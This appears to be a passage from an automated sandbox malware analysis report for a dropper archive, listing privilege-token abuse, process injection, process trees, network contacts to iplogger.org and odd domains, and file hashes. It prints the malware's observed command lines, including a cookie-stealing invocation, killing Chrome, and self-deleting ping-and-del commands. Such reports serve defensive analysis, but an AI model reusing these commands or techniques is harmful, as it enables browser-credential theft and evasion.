cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Windows\SysWOW64\cmd.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 604 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2008 wrote to memory of 1392 N/A C:\Windows\SysWOW64\cmd.exe C:\Program Files\Internet Explorer\iexplore.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 2040 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe
PID 1392 wrote to memory of 664 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 604 wrote to memory of 1904 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1392 wrote to memory of 664 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 604 wrote to memory of 1904 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1392 wrote to memory of 664 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 604 wrote to memory of 1904 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1392 wrote to memory of 664 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 604 wrote to memory of 1904 N/A C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
PID 1708 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 1820 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 2040 wrote to memory of 1204 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe
PID 1820 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1820 wrote to memory of 1812 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 1204 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe C:\Windows\SysWOW64\cmd.exe
PID 1204 wrote to memory of 308 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
PID 2040 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
PID 2040 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
PID 2040 wrote to memory of 1656 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
PID 308 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 308 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 308 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 308 wrote to memory of 1700 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1656 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe C:\Windows\SysWOW64\cmd.exe
PID 1656 wrote to memory of 1156 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe C:\Windows\SysWOW64\cmd.exe
PID 2040 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
PID 2040 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
PID 2040 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
PID 2040 wrote to memory of 1812 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe
PID 1156 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1156 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1156 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1156 wrote to memory of 1832 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 2040 wrote to memory of 1624 N/A C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

Processes

C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe

"C:\Users\Admin\AppData\Local\Temp\45768b491c097e5ca2f78860e8284de9d4347cbedb39b63b1d7cac4945c6004c.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat" "

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/1qzLu7

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.org/14Ahe7

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:604 CREDAT:275457 /prefetch:2

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1392 CREDAT:275457 /prefetch:2

C:\Windows\SysWOW64\cmd.exe

/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /t 3

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"

C:\Windows\SysWOW64\PING.EXE

ping 1.1.1.1 -n 1 -w 3000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe" >> NUL

C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\002.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp

"C:\Users\Admin\AppData\Local\Temp\is-TCVUH.tmp\Setup.tmp" /SL5="$40284,680561,121344,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\searzar\searzar.exe"

C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe

"C:\Users\Admin\AppData\Local\Temp\RarSFX0\hjjgaa.exe"

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe

C:\Users\Admin\AppData\Local\Temp\jfiag_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fjgha23_fa.txt

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 sfsdfpizdatrtu.space udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 www.rationalowl.com udp
KR 211.239.150.87:443 www.rationalowl.com tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 ffdownload.online udp
US 8.8.8.8:53 www.ipcode.pw udp
DE 51.195.46.236:80 www.ipcode.pw tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 www.nicekkk.pw udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 www.facebook.com udp
NL 31.13.64.35:443 www.facebook.com tcp
US 8.8.8.8:53 www.dwedfe.pw udp
US 64.225.91.73:80 www.dwedfe.pw tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 j8hghe3uyf.2ihsfa.com udp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp
US 99.83.154.118:80 j8hghe3uyf.2ihsfa.com tcp

Files

memory/2040-55-0x0000000075AC1000-0x0000000075AC3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX0\DreamTrips.bat

MD5 c25faf98d787b358c72543e7e11917c8
SHA1 911d1eb09ba90b071795842089d57d741f959ee3
SHA256 86d72c90e984ebbaf8917bc49c16a68752f8e1e73e59f61eb004eb0b92e1ad40
SHA512 b7e97564dcccc813cda0d6632fb5229a231b2606c2a3b01addb0b2889e7b20c433760b95b7f8273ff2fa423a848fde7aa8ef13b52605e93520b7475815cc2720

\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

C:\Users\Admin\AppData\Local\Temp\RarSFX0\pub4.exe

MD5 9d7fb45d27ca947c3de8dfc20a4bfe65
SHA1 1669a4eb54494813218d1753b8faa1c6bc88dc0a
SHA256 ca2c2265df617e8932693569c3e6e109ff244599ca268a7e4fd0f7e5edbdfff5
SHA512 2b82880e4de3311f93197d7433c83ec8e3f41e69e99db1c665b69807ef4716de6ca0cf1da340a30c03ca7b4810f767b7766733ec25d07e1a143d1208607d5558

memory/1708-64-0x0000000002C10000-0x0000000002C4B000-memory.dmp

memory/1708-66-0x0000000000220000-0x0000000000255000-memory.dmp

memory/1708-67-0x0000000000400000-0x00000000027C7000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D9281271-8756-11EC-A514-46595837F587}.dat

MD5 bc5a168c3f12e297f450f2808d691d16
SHA1 7e30d4d9077576bc1094b3f091b4f7548c193e9f
SHA256 9fba3f8d65f9f75c6a79e96cd43afa0e19fefab641524c3584d0d867031a5632
SHA512 35a6e12e94229f136c1931bf2bf8b77b2ff5cdae2a966f7c9bcb0c95b5eb8c639c94dac833cc9f6e4e7fae042a8b2ca45982cc831de6d3c36c8ddedad07479d0

\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
SHA256 a7e98ba4e9b3149d35cbf64b09bc727b5136ec8375a366ca42d66d1c4fc9e25c
SHA512 84c00731b0724a09d82410c5b0fe40d910c62076ae9fa10a385d084d4dffad5b194b38fd92d48b5fa1991b2fd6e8a370d5f4c43e7f09b424c65c41356ff48f29

\Users\Admin\AppData\Local\Temp\RarSFX0\setup.upx.exe

MD5 010ebf726b3cc67e92eb91d7afbfbd59
SHA1 02db1d5bf39903099612ddb12d4b8918657f0ec0
